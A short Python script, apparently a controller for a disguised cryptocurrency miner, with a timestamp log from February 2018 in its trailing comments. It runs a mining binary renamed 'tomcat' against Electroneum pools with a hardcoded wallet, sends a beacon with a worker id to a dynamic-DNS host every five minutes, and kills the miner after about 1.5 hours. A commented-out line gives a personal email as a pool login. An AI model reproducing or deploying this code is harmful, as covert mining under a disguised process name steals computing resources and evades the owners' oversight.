import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:35:07.200338
#2018-02-17 16:20:06.505332
#2018-02-17 18:08:05.165615
#2018-02-17 19:56:01.780251
#2018-02-17 21:44:01.704033
#2018-02-17 23:28:04.024568
#2018-02-18 01:18:07.448198
#2018-02-18 03:06:01.540010
#2018-02-18 04:54:01.827960
#2018-02-18 06:47:01.872666
#2018-02-18 08:34:05.151833
#2018-02-18 10:21:06.546542
#2018-02-18 12:07:07.615690
#2018-02-18 13:52:01.506481
#2018-02-18 15:42:02.084908
#2018-02-18 17:32:01.584586
#2018-02-18 19:19:04.135901
#2018-02-18 21:05:05.120948
#2018-02-18 22:51:05.852060
#2018-02-19 00:39:06.139674
#2018-02-19 02:24:06.726037
#2018-02-19 04:11:04.098118
#2018-02-19 05:55:05.813728
#2018-02-19 07:43:07.131004
#2018-02-19 09:32:06.505695
#2018-02-19 11:22:06.164692
#2018-02-19 13:09:08.397047
#2018-02-19 14:57:05.877349
#2018-02-19 16:46:12.245123
#2018-02-19 18:33:05.668087
#2018-02-19 20:20:10.501544
#2018-02-19 22:09:06.310115
#2018-02-19 23:56:08.474852
#2018-02-20 01:43:04.143030
#2018-02-20 03:32:07.672286
#2018-02-20 05:19:06.449598
#2018-02-20 07:04:07.146086
#2018-02-20 08:50:07.395522
#2018-02-20 10:34:06.324777
#2018-02-20 12:19:05.207346
#2018-02-20 14:07:04.275326
#2018-02-20 15:51:04.555047
#2018-02-20 17:37:01.310087
#2018-02-20 19:26:06.119331
#2018-02-20 21:14:07.146672
#2018-02-20 22:58:06.521411
#2018-02-21 00:43:03.538364
#2018-02-21 02:28:06.497798
#2018-02-21 04:14:03.757910
#2018-02-21 06:02:01.572434
#2018-02-21 07:50:06.891714
#2018-02-21 09:36:05.096790
#2018-02-21 11:24:07.228602
#2018-02-21 13:13:05.128734
#2018-02-21 14:59:06.099687
#2018-02-21 16:48:02.216090
#2018-02-21 18:33:08.785242
#2018-02-21 20:19:09.314115
#2018-02-21 22:08:07.037741
#2018-02-21 23:56:06.563366
#2018-02-22 01:44:04.643185
#2018-02-22 03:32:01.887715
#2018-02-22 05:18:08.494324
#2018-02-22 07:04:02.220398
#2018-02-22 08:51:04.663224
#2018-02-22 10:39:05.190932
#2018-02-22 12:25:09.351643
#2018-02-22 14:10:08.347038
#2018-02-22 15:58:08.163455
#2018-02-22 17:45:11.920862
#2018-02-22 19:32:06.081988
#2018-02-22 21:25:09.876734
#2018-02-22 23:12:05.884639
#2018-02-23 00:58:05.886952
#2018-02-23 02:44:07.996474
#2018-02-23 04:33:06.386268
#2018-02-23 06:19:01.409971
#2018-02-23 08:06:01.872525
#2018-02-23 10:20:08.120685
#2018-02-23 12:12:08.806130
#2018-02-23 13:58:09.323355
#2018-02-23 15:51:08.289391
#2018-02-23 17:36:09.818884
#2018-02-23 19:22:06.868973
#2018-02-23 21:06:02.205530
#2018-02-23 22:51:07.355978
#2018-02-24 00:41:03.889181
#2018-02-24 02:32:06.068238
#2018-02-24 04:26:01.492526
#2018-02-24 06:11:08.122609
#2018-02-24 07:58:04.206627
#2018-02-24 09:43:06.369613
#2018-02-24 11:39:08.231001
#2018-02-24 13:31:01.656234
#2018-02-24 15:18:06.304148
#2018-02-24 17:07:06.050496
#2018-02-24 18:59:06.246011
#2018-02-24 20:46:05.453231
#2018-02-24 23:02:06.938597
#2018-02-25 02:19:06.838478
#2018-02-25 05:41:05.219585
#2018-02-25 11:36:08.190889